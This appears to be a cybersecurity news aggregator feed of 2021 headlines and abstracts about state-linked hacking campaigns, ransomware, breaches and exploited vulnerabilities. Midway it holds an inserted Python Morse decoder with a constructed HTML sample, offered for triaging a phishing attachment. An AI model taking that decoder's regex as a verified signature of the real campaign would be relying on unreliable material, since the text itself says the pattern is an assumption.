Microsoft Warns of Iran-Linked Hackers Targeting US and Israeli Defense Firms Full Text
Abstract
An emerging threat actor likely supporting Iranian national interests has been behind a password spraying campaign targeting US, EU, and Israeli defense technology companies, with additional activity observed against regional ports of entry in the Persian Gulf as well as maritime and cargo transportation companies focused in the Middle East. Microsoft is tracking the hacking crew under the moniker DEV-0343. The intrusions, which were first observed in late July 2021, are believed to have targeted more than 250 Office 365 tenants, fewer than 20 of which were successfully compromised following a password spray attack — a type of brute force attack wherein the same password is cycled against different usernames to log into an application or a network in an effort to avoid account lockouts. Indications thus far allude to the possibility that the activity is part of an intellectual property theft campaign aimed at government partners producing military-grade radars, drone technologyThe Hacker News
October 11, 2021
Microsoft reports Iranian hackers targeting US, Israeli defense companies Full Text
Abstract
Microsoft on Monday released evidence showing Iranian-linked hackers targeting and at times compromising systems of U.S. and Israeli defense technology companies.The Hill
October 11, 2021
Microsoft: Iran-linked hackers target US defense tech companies Full Text
Abstract
Iran-linked threat actors are targeting the Office 365 tenants of US and Israeli defense technology companies in extensive password spraying attacks.BleepingComputer
October 8, 2021
Atom Silo Group Eyeing Confluence Servers Full Text
Abstract
SophosLabs researchers uncovered Atom Silo, a new ransomware group almost identical to LockFile, actively exploiting an Atlassian Confluence Server and Data Center flaw. The group is using several novel techniques that make it very challenging to examine, including DLL side-loading to interrupt endpo ...Cyware Alerts - Hacker News
October 8, 2021
Update: Hackers of SolarWinds stole data on U.S. sanctions policy, intelligence probes Full Text
Abstract
The campaign alarmed officials with its stealth and careful staging. The hackers burrowed into the code production process at SolarWinds, which makes widely used software for managing networks.Reuters
October 07, 2021
Microsoft report finds Russia dominant force behind cyberattacks in past year Full Text
Abstract
Cyberattacks originating in Russia accounted for more than half of intrusions tracked by Microsoft since mid-2020, the company said in a report released Thursday.The Hill
October 06, 2021
Iranian Hackers Abuse Dropbox in Cyberattacks Against Aerospace and Telecom Firms Full Text
Abstract
Details have emerged about a new cyber espionage campaign directed against the aerospace and telecommunications industries, primarily in the Middle East, with the goal of stealing sensitive information about critical assets, organizations' infrastructure, and technology while remaining in the dark and successfully evading security solutions. Boston-based cybersecurity company Cybereason dubbed the attacks "Operation Ghostshell," pointing out the use of a previously undocumented and stealthy remote access trojan (RAT) called ShellClient that's deployed as the main spy tool of choice. The first sign of the attacks was observed in July 2021 against a handpicked set of victims, indicating a highly targeted approach. "The ShellClient RAT has been under ongoing development since at least 2018, with several iterations that introduced new functionalities, while it evaded antivirus tools and managed to remain undetected and publicly unknown," researchers Tom FakThe Hacker News
October 6, 2021
Exclusive: Researchers dumped Gigabytes of data from Agent Tesla C2Cs Full Text
Abstract
Resecurity researchers dumped gigabytes of data from Agent Tesla C2Cs; one of the most well-known cyberespionage tools has suffered a data leak. Agent Tesla, first discovered in late 2014, is an extremely popular "malware-as-a-service" Remote Access...Security Affairs
October 06, 2021
Hackers use stealthy ShellClient malware on aerospace, telco firms Full Text
Abstract
Threat researchers investigating malware used to target companies in the aerospace and telecommunications sectors discovered a new threat actor that has been running cyber espionage campaigns since at least 2018.BleepingComputer
October 05, 2021
New Study Links Seemingly Disparate Malware Attacks to Chinese Hackers Full Text
Abstract
Chinese cyber espionage group APT41 has been linked to seemingly disparate malware campaigns, according to fresh research that has mapped together additional parts of the group's network infrastructure to hit upon a state-sponsored campaign that takes advantage of COVID-themed phishing lures to target victims in India. "The image we uncovered was that of a state-sponsored campaign that plays on people's hopes for a swift end to the pandemic as a lure to entrap its victims," the BlackBerry Research and Intelligence team said in a report shared with The Hacker News. "And once on a user's machine, the threat blends into the digital woodwork by using its own customized profile to hide its network traffic." APT41 (aka Barium or Winnti) is a moniker assigned to a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in conjunction with financially motivated operations for personal gain as far back as 2012. Calling the groThe Hacker News
October 5, 2021
Dark web marketplace White House announces end to its operations Full Text
Abstract
The dark web marketplace White House Market has shut down its operation; last week its operators announced on the Dread forum that they were retiring.Security Affairs
October 04, 2021
RaidForums forced to use mirror after Brazilian govt contacts registrar Full Text
Abstract
The RaidForums hacking forum has gone through a turbulent week, with its website now forced through a mirror domain after a government filed a legal request with their registrar.BleepingComputer
October 01, 2021
Chinese Hackers Used a New Rootkit to Spy on Targeted Windows 10 Users Full Text
Abstract
A formerly unknown Chinese-speaking threat actor has been linked to a long-standing evasive operation aimed at South East Asian targets as far back as July 2020 to deploy a kernel-mode rootkit on compromised Windows systems. Attacks mounted by the hacking group, dubbed GhostEmperor by Kaspersky, are also said to have used a "sophisticated multi-stage malware framework" that allows for providing persistence and remote control over the targeted hosts. The Russian cybersecurity firm called the rootkit Demodex, with infections reported across several high-profile entities in Malaysia, Thailand, Vietnam, and Indonesia, in addition to outliers located in Egypt, Ethiopia, and Afghanistan. "[Demodex] is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting undocumented loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver SigThe Hacker News
September 30, 2021
Experts show how to make fraudulent payments using Apple Pay with VISA on locked iPhones Full Text
Abstract
Security researchers devised a new attack method against iPhone owners using Apple Pay and Visa payment cards. Boffins from the University of Birmingham and the University of Surrey exploited a series of vulnerabilities in an attack against iPhone...Security Affairs
September 30, 2021
Innovative Proxy Phantom ATO Fraud Ring Haunts eCommerce Accounts Full Text
Abstract
The group uses millions of password combos at the rate of nearly 2,700 login attempts per minute with new techniques that push the ATO envelope.Threatpost
September 30, 2021
GhostEmperor hackers use new Windows 10 rootkit in attacks Full Text
Abstract
Chinese-speaking cyberspies have targeted Southeast Asian governmental entities and telecommunication companies for more than a year, backdooring systems running the latest Windows 10 versions with a newly discovered rootkit.BleepingComputer
September 30, 2021
New Tomiris Backdoor Found Linked to Hackers Behind SolarWinds Cyberattack Full Text
Abstract
Cybersecurity researchers on Wednesday disclosed a previously undocumented backdoor likely designed and developed by the Nobelium advanced persistent threat (APT) behind last year's SolarWinds supply chain attack, joining the threat actor's ever-expanding arsenal of hacking tools. Moscow-headquartered firm Kaspersky codenamed the malware "Tomiris," calling out its similarities to another second-stage malware used during the campaign, SUNSHUTTLE (aka GoldMax), targeting the IT management software provider's Orion platform. Nobelium is also known by the monikers UNC2452, SolarStorm, StellarParticle, Dark Halo, and Iron Ritual. "While supply-chain attacks were already a documented attack vector leveraged by a number of APT actors, this specific campaign stood out due to the extreme carefulness of the attackers and the high-profile nature of their victims," Kaspersky researchers said. "Evidence gathered so far indicates that Dark Halo spent siThe Hacker News
September 29, 2021
Hackers Targeting Brazil’s PIX Payment System to Drain Users’ Bank Accounts Full Text
Abstract
Two newly discovered malicious Android applications on Google Play Store have been used to target users of Brazil's instant payment ecosystem in a likely attempt to lure victims into fraudulently transferring their entire account balances into another bank account under cybercriminals' control. "The attackers distributed two different variants of banking malware, named PixStealer and MalRhino, through two separate malicious applications […] to carry out their attacks," Check Point Research said in an analysis shared with The Hacker News. "Both malicious applications were designed to steal money of victims through user interaction and the original PIX application." The two apps in question, which were uncovered in April 2021, have since been removed from the app store. Launched in November 2020 by the Central Bank of Brazil, the country's monetary authority, Pix is a state-owned payments platform that enables consumers and companies to make moneThe Hacker News
September 29, 2021
New Tomiris backdoor likely developed by SolarWinds hackers Full Text
Abstract
Kaspersky security researchers have discovered a new backdoor likely developed by the Nobelium hacking group behind last year's SolarWinds supply chain attack.BleepingComputer
September 29, 2021
TA544 Threat Group Targets Over 2,000 Italian Organizations with Ursnif Malware Full Text
Abstract
Proofpoint has observed nearly 20 notable campaigns distributing thousands of messages targeting Italian organizations this year, which equals 80% of the number of similar campaigns in 2020.Proofpoint
September 28, 2021
Researchers uncover new techniques used to spread FinSpy Full Text
Abstract
Apart from the Trojanized installers, Kaspersky observed infections involving usage of a UEFI or MBR bootkit. While the MBR infection is well known, details on the UEFI bootkit are newly revealed.Kaspersky Labs
September 28, 2021
Suspected Chinese State-linked Threat Actors Infiltrated Major Afghan Telecom Provider Roshan Full Text
Abstract
Four distinct infiltrations by suspected Chinese-state-sponsored threat actors stole gigabytes of data from the corporate mail server of major Afghan telecom provider Roshan within the past year.The Record
September 27, 2021
Microsoft: Nobelium uses custom malware to backdoor Windows domains Full Text
Abstract
Microsoft has discovered new malware used by the Nobelium hacking group to deploy additional payloads and steal sensitive info from Active Directory Federation Services (AD FS) servers.BleepingComputer
September 27, 2021
Attackers Use Fake Installers to Drop Malware and Open Doors for Cryptomining and Credential Theft Full Text
Abstract
Fake installers of popular software are being used to deliver malware onto victims’ devices. These lures trick users into opening malicious documents or installing unwanted applications.Trend Micro
September 26, 2021
Google TAG spotted actors using new code signing tricks to evade detection Full Text
Abstract
Researchers from Google’s Threat Analysis Group (TAG) reported that financially motivated actors are using new code signing tricks to evade detection.Security Affairs
September 24, 2021
Hackers exploiting critical VMware vCenter CVE-2021-22005 bug Full Text
Abstract
Exploit code that could be used for remote code execution on VMware vCenter Server vulnerable to CVE-2021-22005 has been released today and attackers are already using it.BleepingComputer
September 24, 2021
Google Warns of a New Way Hackers Can Make Malware Undetectable on Windows Full Text
Abstract
Cybersecurity researchers have disclosed a novel technique adopted by threat actors to deliberately evade detection with the help of malformed digital signatures of its malware payloads. "Attackers created malformed code signatures that are treated as valid by Windows but are not able to be decoded or checked by OpenSSL code — which is used in a number of security scanning products," Google Threat Analysis Group's Neel Mehta said in a write-up published on Thursday. The new mechanism was observed to be exploited by a notorious family of unwanted software known as OpenSUpdater that's used to download and install other suspicious programs on compromised systems. Most targets of the campaign are users located in the U.S. who are prone to downloading cracked versions of games and other grey-area software. The findings come from a set of OpenSUpdater samples uploaded to VirusTotal at least since mid-August. Not only are the artifacts signed with an invalid lThe Hacker News
September 22, 2021
Operation Layover by Nigerian Threat Actor Targets Aviation Sector Full Text
Abstract
Cisco Talos uncovered a three-year-long espionage campaign, dubbed Operation Layover, aimed at the airline industry. Cybercriminals are spreading AsyncRAT and njRAT via malicious documents. In the ongoing campaign, attackers can change their crypter/attack vector and continue stealing from victims ...Cyware Alerts - Hacker News
September 21, 2021
Russian state hackers use new TinyTurla malware as secondary backdoor Full Text
Abstract
Russian state-sponsored hackers known as the Turla APT group have been using new malware over the past year that acted as a secondary persistence method on compromised systems in the U.S., Germany, and Afghanistan.BleepingComputer
September 20, 2021
A hacker may have personal information of thousands of NEISD employees Full Text
Abstract
Over 5,000 current and former NEISD employees received a letter from the district saying their payroll information, including names and social security numbers, was at risk of being compromised.MySanAntonio
September 18, 2021
Threat actor has been targeting the aviation industry since at least 2018 Full Text
Abstract
Security researchers from the Cisco Talos team uncovered a spear-phishing campaign that targeted the aviation industry for two years while avoiding detection, dubbed Operation...Security Affairs
September 17, 2021
Hackers pose as bank customers by stealing OTPs, making $500k in fake credit card payments Full Text
Abstract
Hackers abroad have been able to pose as 75 bank customers here to make about $500,000 in fake credit card payments. This was done by a sophisticated method of hijacking the OTPs sent by banks.Straits Times
September 13, 2021
Hackers Target Golden SAML Tokens for Network Access Full Text
Abstract
An APT group was spotted targeting the Active Directory server of a victim’s Office 365 environment by gaining access to the secret SAML tokens, which generally pass information about users, logins, and attributes between the identity and service providers. Experts suggest implementing additional ...Cyware Alerts - Hacker News
September 13, 2021
Hackers Steal Puma Source Code for an Internal Application Full Text
Abstract
Hackers have stolen information from sportswear maker Puma and are currently trying to extort the company into paying a ransom demand, threatening to release the stolen files on a dark web portal.The Record
September 13, 2021
North Korea’s Kumsong 121 recently employed social media to launch a cyber attack Full Text
Abstract
The North Korean hacker group Kumsong 121 recently launched a cyber attack using social media. Computer and mobile phone users should be wary as North Korean hacking attacks grow more sophisticated.dailynk
September 08, 2021
Microsoft warns of hackers exploiting Windows vulnerability Full Text
Abstract
Microsoft this week warned that hackers are actively exploiting a vulnerability in its Windows program, urging customers to take steps to shore up security.The Hill
September 8, 2021
TeamTNT Uses Chimaera Malware Bundle in Stealthy New Campaign Full Text
Abstract
AT&T's Alien Labs has sounded the alarm on a malware campaign from TeamTNT which has gone almost entirely undetected by anti-virus and which is turning target devices into cryptocurrency miners.The Register
September 4, 2021
FIN7 group leverages Windows 11 Alpha-Themed docs to drop Javascript payloads Full Text
Abstract
FIN7 cybercrime gang used weaponized Windows 11 Alpha-themed Word documents to drop malicious payloads, including a JavaScript backdoor. Anomali Threat Research experts have monitored recent spear-phishing attacks conducted by financially motivated...Security Affairs
September 4, 2021
Why Ransomware Hackers Love a Holiday Weekend Full Text
Abstract
Ransomware can take time to propagate throughout a network, as hackers work to escalate privileges for maximum control over most systems. The longer it takes for anyone to notice, the more damage they can do.Wired
September 04, 2021
Microsoft Says Chinese Hackers Were Behind SolarWinds Serv-U SSH 0-Day Attack Full Text
Abstract
Microsoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with "high confidence" to a threat actor operating out of China. In mid-July, the Texas-based company remedied a remote code execution flaw (CVE-2021-35211) that was rooted in Serv-U's implementation of the Secure Shell (SSH) protocol, which could be abused by attackers to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data. "The Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration," Microsoft Offensive Research and Security Engineering team said in a detailed write-up describing the exploit. "An attacker can exploit this vulnerability by connecting to the open SSH port and sendinThe Hacker News
September 3, 2021
Chinese hackers behind July 2021 SolarWinds zero-day attacks Full Text
Abstract
The zero-day was the work of a new threat actor tracked as DEV-0322, which Microsoft described as “a group operating out of China, based on observed victimology, tactics, and procedures.”The Record
September 03, 2021
FIN7 Hackers Using Windows 11 Themed Documents to Drop Javascript Backdoor Full Text
Abstract
A recent wave of spear-phishing campaigns leveraged weaponized Windows 11 Alpha-themed Word documents with Visual Basic macros to drop malicious payloads, including a JavaScript implant, against a point-of-sale (PoS) service provider located in the U.S. The attacks, which are believed to have taken place between late June and late July 2021, have been attributed with "moderate confidence" to a financially motivated threat actor dubbed FIN7, according to researchers from cybersecurity firm Anomali. "The specified targeting of the Clearmind domain fits well with FIN7's preferred modus operandi," Anomali Threat Research said in a technical analysis published on September 2. "The group's goal appears to have been to deliver a variation of a JavaScript backdoor used by FIN7 since at least 2018." An Eastern European group active since at least mid-2015, FIN7 has a checkered history of targeting restaurant, gambling, and hospitality industries in thThe Hacker News
September 2, 2021
Attackers are attempting to exploit recently patched Atlassian Confluence CVE-2021-26084 RCE Full Text
Abstract
Threat actors are actively exploiting a recently patched vulnerability in Atlassian’s Confluence enterprise collaboration product. Threat actors were spotted exploiting the CVE-2021-26084 vulnerability in Atlassian’s Confluence enterprise collaboration...Security Affairs
September 1, 2021
Attackers Sell Your Internet Bandwidth for Passive Income Full Text
Abstract
Cisco Talos highlighted the rise in abuse of proxyware that allows adversaries to manipulate compromised internet connections to generate illicit revenue. Attackers were also observed installing digital currency miners and info-stealers to earn additional revenue. In some cases, hackers even patch ... Cyware Alerts - Hacker News
August 31, 2021
Threat actors can remotely disable Fortress S03 Wi-Fi Home Security System Full Text
Abstract
Rapid7 researchers discovered two flaws that can be exploited by attackers to remotely disable one of the home security systems offered by Fortress Security Store. Researchers at cybersecurity firm Rapid7 discovered two vulnerabilities that can be exploited...Security Affairs
August 30, 2021
ISRAELI FIRM ‘BRIGHT DATA’ (LUMINATI NETWORKS) ENABLED THE ATTACKS AGAINST KARAPATAN Full Text
Abstract
Who is behind the massive and prolonged Distributed Denial of Service (DDoS) attack that hit the Philippine human rights alliance Karapatan? The 25-day-long DDoS attack against the website of Karapatan was launched from almost 30,000 IP addresses,...Security Affairs
August 30, 2021
A new wave of Hacktivists is turning the surveillance state against itself Full Text
Abstract
Images and videos stolen from oppressive regimes’ surveillance systems are being leaked in a new surge of suspected hacktivism that uses states’ own panopticons against them.The Record
August 27, 2021
T-Mobile CEO: Hacker brute-forced his way through our network Full Text
Abstract
Today, T-Mobile's CEO Mike Sievert said that the hacker behind the carrier's latest massive data breach brute-forced his way through T-Mobile's network after gaining access to testing environments.BleepingComputer
August 25, 2021
California Man Hacked iCloud Accounts to Steal Nude Photos Full Text
Abstract
Hao Kuo Chi pleaded guilty to four felonies in a hacker-for-hire scam that used socially engineered emails to trick people out of their credentials.Threatpost
August 24, 2021
Hackers Could Increase Medication Doses by Exploiting Security Flaws in Infusion Pumps Full Text
Abstract
Researchers found that an attacker with access to a health care facility's network could take control of B. Braun SpaceStation by exploiting a common connectivity vulnerability.Wired
August 23, 2021
Attackers Actively Exploiting Realtek SDK Flaws Full Text
Abstract
Multiple vulnerabilities in software used by 65 vendors under active attack.Threatpost
August 23, 2021
Hacker gets 500K reward for returning stolen cryptocurrency Full Text
Abstract
The saga of what has been dubbed the biggest hack in the world of decentralized finance appears to be over as Poly Network recovered more than $610 million in cryptocurrency assets it lost two weeks ago and the hacker received a $500,000 bounty for returning the money.BleepingComputer
August 23, 2021
Poly Network claims a hacker returned stolen $600 million Full Text
Abstract
A colossal, as well as bizarre crypto heist story seems to have reached its end. Poly Network, a DeFi platform, announced the hacker that stole over $600 million in one of the largest crypto heists had returned control of the money.Cyber News
August 21, 2021
North Korean Hacker Group Uses Browser Exploits Full Text
Abstract
Security experts at the cybersecurity firm Volexity recently reported an attack in which a North Korean hacker group used browser exploits, served through a compromised website, to deploy custom malware.GB Hackers
August 19, 2021
You can post LinkedIn jobs as almost ANY employer — so can attackers Full Text
Abstract
Anyone can create a job listing on the leading recruitment platform LinkedIn on behalf of any employer—no verification needed. And worse, the employer cannot easily take these down.BleepingComputer
August 19, 2021
CEO tried funding his startup by asking insiders to deploy ransomware Full Text
Abstract
Likely inspired by the LockBit ransomware gang, a Nigerian threat actor tried their luck with a $1 million payment lure to recruit an insider to detonate a ransomware payload on the company servers.BleepingComputer
August 18, 2021
Iranian Hackers Target Several Israeli Organizations With Supply-Chain Attacks Full Text
Abstract
IT and communication companies in Israel were at the center of a supply chain attack campaign spearheaded by an Iranian threat actor that involved impersonating the firms and their HR personnel to target victims with fake job offers in an attempt to penetrate their computers and gain access to the company's clients. The attacks, which occurred in two waves in May and July 2021, have been linked to a hacker group called Siamesekitten (aka Lyceum or Hexane) that has primarily singled out oil, gas, and telecom providers in the Middle East and in Africa at least since 2018, researchers from ClearSky said in a report published Tuesday. Infections undertaken by the adversary commenced with identifying potential victims, who were then enticed with "alluring" job offers in well-known companies like ChipPc and Software AG by posing as human resources department employees from the impersonated firms, only to lead the victims to a phishing website containing weaponized files t... The Hacker News
August 18, 2021
T-Mobile Says Hackers Stole Personal Information on Over 40 Million Current and Prospective Customers Full Text
Abstract
The telco said that the stolen data included first and last names, birth dates, Social Security numbers, and driver’s license information from a subset of current and potential customers.Reuters
August 16, 2021
Hackers behind Iranian wiper attacks linked to Syrian breaches Full Text
Abstract
Destructive attacks that targeted Iran's transport ministry and national train system were coordinated by a threat actor dubbed Indra who previously deployed wiper malware on the networks of multiple Syrian organizations.BleepingComputer
August 16, 2021
Hacker Claims to Sell Personal Data of More Than 100 Million T-Mobile Customers Full Text
Abstract
A cybercriminal is claiming to have data related to more than 100 million T-Mobile customers in the U.S. and is selling access to part of the information for roughly $277,000.Gizmodo
August 13, 2021
UNC215 Impersonated an Iranian Group to Target Israeli Organizations Full Text
Abstract
According to Mandiant, Chinese cyberespionage group UNC215 impersonated Iranian threat actors to target Israeli organizations in a campaign that began in January 2019.Cyware Alerts - Hacker News
August 13, 2021
Bugs in gym management software let hackers wipe fitness history Full Text
Abstract
Security researchers found vulnerabilities in the Wodify fitness platform that allow an attacker to view and modify user workouts from any of the more than 5,000 gyms that use the solution worldwide.BleepingComputer
August 13, 2021
Hackers Spotted Using Morse Code in Phishing Attacks to Evade Detection Full Text
Abstract
Microsoft has disclosed details of an evasive year-long social engineering campaign wherein the operators kept changing their obfuscation and encryption mechanisms every 37 days on average, including relying on Morse code, in an attempt to cover their tracks and surreptitiously harvest user credentials. The phishing attacks take the form of invoice-themed lures mimicking financial-related business transactions, with the emails containing an HTML file ("XLS.HTML"). The ultimate objective is to harvest usernames and passwords, which are subsequently used as an initial entry point for later infiltration attempts. Microsoft likened the attachment to a "jigsaw puzzle," noting that individual parts of the HTML file are designed to appear innocuous and slip past endpoint security software, only to reveal its true colors when these segments are decoded and assembled together. The company did not identify the hackers behind the operation. "This phishing campaign ex... The Hacker News
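The Morse layer Microsoft describes is a plain substitution, so its value to the attackers is only that the segments look like noise to a scanner; for a triager the useful move is to pull the dot-dash strings out of the attachment and decode them before peeling the other layers. The decoder below is an added example written for this page, not Microsoft's analysis tooling and not the campaign's own script. The HTML sample is constructed, and the regular expression for spotting Morse-looking JavaScript string literals is an assumption about how such a segment would look rather than a signature taken from the real attachment.

```python
import re

# International Morse for letters, digits and the punctuation that shows up
# in URLs and file names. Added example written for this page; it is not
# Microsoft's analysis tooling and not the campaign's own decoder script.
MORSE_TABLE = {
    ".-": "a", "-...": "b", "-.-.": "c", "-..": "d", ".": "e", "..-.": "f",
    "--.": "g", "....": "h", "..": "i", ".---": "j", "-.-": "k", ".-..": "l",
    "--": "m", "-.": "n", "---": "o", ".--.": "p", "--.-": "q", ".-.": "r",
    "...": "s", "-": "t", "..-": "u", "...-": "v", ".--": "w", "-..-": "x",
    "-.--": "y", "--..": "z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    ".-.-.-": ".", "-..-.": "/", "---...": ":", "-....-": "-", "..--.-": "_",
}

# A JavaScript string literal holding at least four Morse symbols separated by
# spaces, with "/" as a word separator. This shape is an assumption for the
# constructed sample below, not a signature taken from the real attachment.
MORSE_LITERAL = re.compile(r"""['"]((?:[.-]{1,6}[ /]+){3,}[.-]{1,6})['"]""")


def decode_morse(seq):
    """Decode dot-dash words; unknown symbols become '?' so nothing is silently dropped."""
    words = []
    for word in seq.split("/"):
        words.append("".join(MORSE_TABLE.get(sym, "?") for sym in word.split()))
    return " ".join(words)


def find_morse_strings(html):
    """Return (encoded, decoded) pairs for every Morse-looking literal in an HTML attachment."""
    return [(m.group(1), decode_morse(m.group(1))) for m in MORSE_LITERAL.finditer(html)]


# Constructed stand-in for the "XLS.HTML" attachment: one benign string and one
# Morse-encoded string that the page's own script would decode at run time.
SAMPLE_HTML = """<html><body>
<script>
var t = "hello";
var m = ".-.. --- --. .. -. / .--. .- --. .";
document.write(d(m));
</script>
</body></html>"""

if __name__ == "__main__":
    for encoded, decoded in find_morse_strings(SAMPLE_HTML):
        print(decoded, "<-", encoded)
```

Run it against a saved attachment by reading the file into `find_morse_strings`; a hit that decodes to a hostname, path or script fragment is the signal, and a hit full of `?` means the sample uses a mapping other than standard Morse and needs the attachment's own decode routine read by hand.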
August 13, 2021
WordPress Sites Abused in Aggah Spear-Phishing Campaign Full Text
Abstract
The Pakistan-linked threat group’s campaign uses compromised WordPress sites to deliver the Warzone RAT to manufacturing companies in Taiwan and South Korea.Threatpost
August 13, 2021
Hackers Actively Searching for Unpatched Microsoft Exchange Servers Full Text
Abstract
Threat actors are actively carrying out opportunistic scanning and exploitation of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year. The remote code execution flaws have been collectively dubbed "ProxyShell." At least 30,000 machines are affected by the vulnerabilities, according to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center. "Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities," NCC Group's Richard Warren tweeted, noting that one of the intrusions resulted in the deployment of a "C# aspx webshell in the /aspnet_client/ directory." Patched in early March 2021, ProxyLogon is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server tha... The Hacker News
August 12, 2021
Hackers now backdoor Microsoft Exchange using ProxyShell exploits Full Text
Abstract
Threat actors are actively exploiting Microsoft Exchange servers using the ProxyShell vulnerability to install backdoors for later access.BleepingComputer
August 12, 2021
Hacker claims cryptocurrency site was targeted ‘for fun’ Full Text
Abstract
A person claiming to be behind the massive $600 million cryptocurrency breach said on Thursday they stole the digital tokens "for fun."The Hill
August 12, 2021
Threat actors behind the Poly Network hack are returning stolen funds Full Text
Abstract
The threat actor who hacked the Poly Network cross-chain protocol, stealing $611 million worth of cryptocurrency assets, is returning the stolen funds. The threat actor behind the hack of the Poly Network cross-chain protocol is now returning the stolen funds....Security Affairs
August 12, 2021
Chinese Hacker Group Targets Israel, Pretends to be Iranian Full Text
Abstract
UNC215 used new TTPs to evade detection and attribution, implement false flags, and exploit trusted relationships for lateral propagation. As per Mandiant, the threat actor is still active.Cyware Alerts - Hacker News
August 11, 2021
Hackers return portion of $600 million stolen from cryptocurrency site Full Text
Abstract
Hackers behind the breach of cryptocurrency company Poly Network on Wednesday returned almost half of the $600 million in digital tokens they stole following a plea from the company to do so.The Hill
August 10, 2021
Experts Believe Chinese Hackers Are Behind Several Attacks Targeting Israel Full Text
Abstract
A Chinese cyber espionage group has been linked to a string of intrusion activities targeting Israeli government institutions, IT providers, and telecommunications companies at least since 2019. FireEye's Mandiant threat intelligence arm attributed the campaign to an operator it tracks as "UNC215", a Chinese espionage operation that's believed to have singled out organizations around the world dating back as far as 2014, linking the group with "low confidence" to an advanced persistent threat (APT) widely known as APT27, Emissary Panda, or Iron Tiger. "UNC215 has compromised organizations in the government, technology, telecommunications, defense, finance, entertainment, and health care sectors," FireEye's Israel and U.S. threat intel teams said in a report published today. "The group targets data and organizations which are of great interest to Beijing's financial, diplomatic, and strategic objectives," the findings refl... The Hacker News
August 10, 2021
Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers Full Text
Abstract
Unidentified threat actors are actively exploiting a critical authentication bypass vulnerability to hijack home routers as part of an effort to co-opt them to a Mirai-variant botnet used for carrying out DDoS attacks, merely two days after its public disclosure. Tracked as CVE-2021-20090 (CVSS score: 9.9), the weakness concerns a path traversal vulnerability in the web interfaces of routers with Arcadyan firmware that could allow unauthenticated remote attackers to bypass authentication. Disclosed by Tenable on August 3, the issue is believed to have existed for at least 10 years, affecting at least 20 models across 17 different vendors, including Asus, Beeline, British Telecom, Buffalo, Deutsche Telekom, Orange, Telstra, Telus, Verizon, and Vodafone. Successful exploitation of the flaw could enable an attacker to circumvent authentication barriers and potentially gain access to sensitive information, including valid request tokens, which could be used to make requests to alte... The Hacker News
August 9, 2021
Threat actors are probing Microsoft Exchange servers for ProxyShell flaws Full Text
Abstract
Threat actors are actively scanning for the Microsoft Exchange ProxyShell RCE flaws after technical details were released at the Black Hat conference. Threat actors started actively scanning for the Microsoft Exchange ProxyShell remote...Security Affairs
August 7, 2021
Hackers attempt to breach Illinois State Police FOID website Full Text
Abstract
The Illinois State Police have said that they have added additional online security requirements to FOID online application system after hackers attempted to breach the site.Yahoo! Finance
August 5, 2021
ITG18: Operational Security Errors Continue to Plague Sizable Iranian Threat Group Full Text
Abstract
IBM Security X-Force researchers continue to track the infrastructure and activity of a suspected Iranian threat group ITG18. This group’s TTPs overlap with Charming Kitten, Phosphorus, and TA453.Security Intelligence
August 5, 2021
Watch a Hacker Hijack a Capsule Hotel’s Lights, Fans, and Beds Full Text
Abstract
A security researcher exploited IoT flaws that allowed him to hijack the controls for any room at the hotel to mess with its lights, ventilation, and the beds in each room that convert to a couch.Wired
August 4, 2021
‘I’m Calling About Your Car Warranty’, aka PII Hijinx Full Text
Abstract
Black Hat: Researchers created 300 fake identities, signed them up on 185 legit sites, then tracked how much the sites used signup PII to pester the accounts.Threatpost
August 03, 2021
Chinese Hackers Target Major Southeast Asian Telecom Companies Full Text
Abstract
Three distinct clusters of malicious activities operating on behalf of Chinese state interests have staged a series of attacks to target networks belonging to at least five major telecommunications companies located in Southeast Asian countries since 2017. "The goal of the attackers behind these intrusions was to gain and maintain continuous access to telecommunication providers and to facilitate cyber espionage by collecting sensitive information, compromising high-profile business assets such as the billing servers that contain Call Detail Record (CDR) data, as well as key network components such as the Domain Controllers, Web Servers and Microsoft Exchange servers," Cybereason's Lior Rochberger, Tom Fakterman, Daniel Frank, and Assaf Dahan revealed in a technical analysis published Tuesday. The Boston-based cybersecurity firm linked the campaigns to three different Chinese threat actors, namely Gallium (aka Soft Cell), Naikon APT (aka APT30 or Lotus Panda), a... The Hacker News
August 1, 2021
GhostEmperor, a new Chinese-speaking threat actor targets Southeast Asia Full Text
Abstract
Kaspersky experts spotted a previously undocumented Chinese-speaking threat actor, tracked as GhostEmperor, that is exploiting Microsoft Exchange flaws in attacks on high-profile victims. Kaspersky spotted a new Chinese-speaking threat actor, tracked...Security Affairs
July 31, 2021
Evidence suggests Russia’s SVR is still using ‘WellMess’ malware, despite US warnings Full Text
Abstract
RiskIQ said in a report that it uncovered active hacking infrastructure that Western governments attributed last summer to the Russian SVR intelligence agency-linked APT29 or Cozy Bear, which it used at the time to try to steal Covid-19 research.Cyberscoop
July 30, 2021
SolarWinds hackers accessed over two dozen federal prosecutors’ offices: DOJ Full Text
Abstract
The Department of Justice (DOJ) said Friday that the hackers behind the major SolarWinds attack compromised employee accounts in more than two dozen federal prosecutors’ offices.The Hill
July 29, 2021
Hackers Exploit Microsoft Browser Bug to Deploy VBA Malware on Targeted PCs Full Text
Abstract
